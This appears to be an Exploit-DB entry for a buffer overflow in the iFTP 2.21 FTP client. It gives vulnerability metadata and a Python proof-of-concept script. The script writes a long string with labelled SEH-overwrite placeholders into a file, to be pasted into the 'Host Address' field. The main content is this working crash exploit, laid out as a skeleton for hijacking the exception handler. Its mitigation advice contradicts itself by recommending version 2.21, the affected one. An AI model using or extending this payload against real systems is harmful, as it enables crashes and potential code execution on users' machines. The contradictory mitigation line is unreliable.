iFTP 2.21 Buffer OverFlow Crash PoC

vendor:

iFTP

by:

dogo h@ck

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: iFTP

Affected Version From: 2.21

Affected Version To: 2.21

Patch Exists: YES

Related CWE: N/A

CPE: a:memecode:iftp:2.21

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Sp3

2015

iFTP 2.21 Buffer OverFlow Crash PoC

iFTP 2.21 is vulnerable to a buffer overflow when a long string is sent to the 'Host Address' field. This can be exploited to cause a crash when the user attempts to connect to the malicious host.

Mitigation:

Upgrade to the latest version of iFTP 2.21 or later.

Source

Exploit-DB raw data:

#!/usr/bin/python
###########################################################################################
#Exploit Title:iFTP 2.21 Buffer OverFlow Crash PoC
#Author: dogo h@ck
#Date Discovered :  12-5-2015
#Vendor Homepage: http://www.memecode.com/iftp.php
#Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
#Version: 2.21
#Tested on : Windows XP Sp3
###########################################################################################
#Crash : Go to Connect >  Host Address > Post it
#Bad Characters (\x00\x09\x0a\x0d\x80 and all from \x80 To \xFF I know It's FU&^% :( )
############################################################################################

buffer = "A"*1865
buffer +="BBBB" #Pointer to next SEH record
buffer +="CCCC" #SE handler
buffer +="D"*500
file = "buffer.txt"

f = open(file, "w")

f.write(buffer)

f.close()